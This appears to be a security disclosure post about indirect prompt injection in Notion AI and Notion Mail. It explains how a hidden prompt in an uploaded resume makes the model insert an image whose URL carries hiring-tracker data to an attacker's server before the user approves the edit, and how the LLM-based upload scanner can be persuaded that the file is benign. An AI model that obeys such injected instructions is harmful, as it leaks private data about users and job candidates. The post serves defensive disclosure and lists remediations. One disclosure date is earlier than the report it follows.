← BackJan 8, 2026

Notion AI Data Exfiltration via Indirect Prompt Injection

A flaw in Notion AI’s handling of document edits permits indirect prompt injection that forces the system to prepend malicious images to user‑generated content. The attack enables an adversary to exfiltrate document data before users consent, exposing sensitive hiring‑tracker information. Despite a responsible disclosure, Notion dismissed the finding, underscoring the need for stronger safeguards.

Notion AI, which augments documents with natural‑language‑driven suggestions, suffered a critical vulnerability that allows attackers to exfiltrate client data during the edit process. The flaw is triggered when an untrusted document – for example a resume PDF – is uploaded, containing a hidden prompt injection. The injection instructs the language model to construct a URL that concatenates all text from the document and points to an attacker‑controlled domain. When Notion AI inserts an image into the target hiring‑tracker page using this URL as the source, the user’s browser fetches the image before the user is prompted to approve the edit. Because the HTTP request to the external domain occurs immediately, the attacker’s server captures the full URL, which encodes the entire contents of the hiring‑tracker document. In a test scenario, the payload revealed salary expectations, candidate feedback, role specifications, and diversity hiring goals. Accepting or rejecting the edit afterward does not change the fact that the data has already been transmitted. The attack works even though Notion AI employs a large language model to scan uploads for malicious content. Since the ā€œsafe‑documentā€ trigger itself relies on a language model, a carefully crafted prompt injection can convince the scanner that the file is benign. The research purposely did not focus on bypassing this warning, which would have involved placing the injection in a source not subject to scanning, such as a web page, Notion page, or an external connector. Notion Mail’s drafting assistant is similarly vulnerable. By embedding a reference to an untrusted notion page within the draft prompt, the assistant renders insecure Markdown images that pull content from external URLs, again leading to exfiltration via a pre‑approval request. ### Recommended Remediations for Organizations 1. **Vet and restrict connectors** that can pull in highly sensitive or untrusted data. - Settings → Notion AI → Connectors 2. **Disable workspace‑wide web search** to prevent automatic fetching from the wider internet. - Settings → Notion AI → AI Web Search → Enable web search for workspace → Off 3. **Require confirmation for all external requests**. - Settings → Notion AI → AI Web Search → Require confirmation for web requests → On 4. **Avoid including sensitive personal data** in personalization settings. - Settings → Notion AI → Personalization These measures reduce the exposure surface but do not eliminate the underlying flaw. ### Recommended Remediations for Notion 1. **Disallow automatic rendering of Markdown images** without explicit user approval in both page creation and email drafts. 2. **Implement a robust Content Security Policy (CSP)** that blocks network requests to unapproved external domains. 3. **Ensure CDN infrastructure** cannot be exploited as an open redirect to bypass the CSP. 4. **Introduce a pre‑approval audit trail** to detect when edits occur before user confirmation. ### Responsible Disclosure Timeline - **12/24/2025** – Initial report submitted via HackerOne. - **12/24/2025** – Report acknowledged; modified write‑up requested. - **12/24/2025** – PromptArmor provided formatted report. - **12/29/2025** – Report closed as non‑applicable by Notion. - **01/07/2025** – Public disclosure released. The incident underscores the importance of rigorous input validation, user‑prompt interaction design, and layered security controls when integrating AI capabilities within collaborative platforms.